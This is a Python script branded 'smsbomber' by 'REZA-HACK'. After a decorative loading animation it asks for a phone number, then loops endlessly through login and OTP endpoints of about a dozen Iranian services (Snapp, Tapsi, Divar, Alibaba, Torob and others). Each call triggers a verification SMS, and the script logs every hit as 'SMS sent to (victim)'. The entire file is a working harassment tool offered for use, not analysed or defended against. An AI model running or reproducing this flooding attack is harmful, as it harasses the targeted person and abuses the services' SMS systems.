from cgi import print_directory
from requests import post , get
import os
from os import system
from time import sleep
import time
import os
import socket
import random
import threading
import logging
import sys
import urllib
import _thread
import time
from colorama import Fore


try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [W]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [A]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [I]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [T]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [I]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [N]")
time.sleep(0.4)
try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [G]")
time.sleep(0.4)


try: system("clear")
except: system ("class")
s = "\033[91m\033"
print (s+" 0% [=                              ]")
sleep (0.3)
try: system("clear")
except: system ("class")
print ("15% [===                         ]")
sleep (0.3)
try: system ("clear")
except: system("class")
print ("20% [=======                      ]")
sleep (0.3)
try: system("clear")
except: system("class")
print ("30% [=========                 ]")
sleep (0.3)
try: system("clear")
except: system("class")
print ("45% [==============          ]")
sleep (0.3)
try: system("clear")
except: system("class")
print ("65% [=======================          ]")
sleep (0.3)
try: system ("clear")
except: system("class")
print ("85% [=============================       ]")
sleep (0.3)
try: system("clear")
except: system("class")
print ("100% [========================================================]")
sleep (1)
os.system('clear')

print(Fore.GREEN + """

                        _                     _               
      ___ _ __ ___  ___| |__   ___  _ __ ___ | |__   ___ _ __ 
     / __| '_ ` _ \/ __| '_ \ / _ \| '_ ` _ \| '_ \ / _ \ '__|
     \__ \ | | | | \__ \ |_) | (_) | | | | | | |_) |  __/ |   
     |___/_| |_| |_|___/_.__/ \___/|_| |_| |_|_.__/ \___|_|   
 """)
print('                           <REZA-HACK>                          ')
print('__________________________________________________________________')

number = input(' \nEnter your numbers[09*******]:-» ')



########

snapj = {"phone":number}
tapsi1 = {"credential":{"phoneNumber":number,"role":"PASSENGER"}}
divarj = {"phone":number}
emd = "send=1&cellphone="+number
rubj = {"api_version":"3","method":"sendCode","data":{"phone_number":number,"send_type":"SMS"}}
bamad = "cellNumber="+number
ali = {"phoneNumber": number }
hamrah = {"action":"getAppViaSMS","number": number }
arkd = {"mobile":number,"country_code":"IR","provider_code":"RUBIKA"}
while True:
    r3 = post("https://api.tapsi.cab/api/v2/user",json=tapsi1)
    if r3.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r4 = post("https://api.divar.ir/v5/auth/authenticate",json=divarj)
    if r4.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r5 = post("https://messengerg2c42.iranlms.ir/",json=rubj)
    if r5.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r6 = post("https://app.snapp.taxi/api/api-passenger-oauth/v2/otp",json=snapj)
    if r6.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r7 = post("https://web.emtiyaz.app/json/login",data=emd)
    if r7.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r8 = post("https://bama.ir/signin-checkforcellnumber",data=bamad)
    if r8.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r9 = post("https://ws.alibaba.ir/api/v3/account/mobile/otp",json=ali)
    if r9.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r11 = post("https://api.chartex.net/api/v2/user/validate",json=arkd)
    if r11.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r12 = get("https://api.torob.com/a/phone/send-pin/?phone_number="+number)
    if r12.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r13 = get("https://api.binjo.ir/api/panel/get_code/"+number)
    if r13.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r14 = get("https://core.gap.im/v1/user/add.json?mobile="+number)
    if r14.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
    r15 = post(f'https://api.snapp.market/mart/v1/user/loginMobileWithNoPass?cellphone=0{number}')
    if r15.status_code == 200:
        print(Fore.GREEN +' [+] SMS sent to (victim) ' , number)
    else:
        print(Fore.RED +' [+] SMS not sent to (victim )' , number)
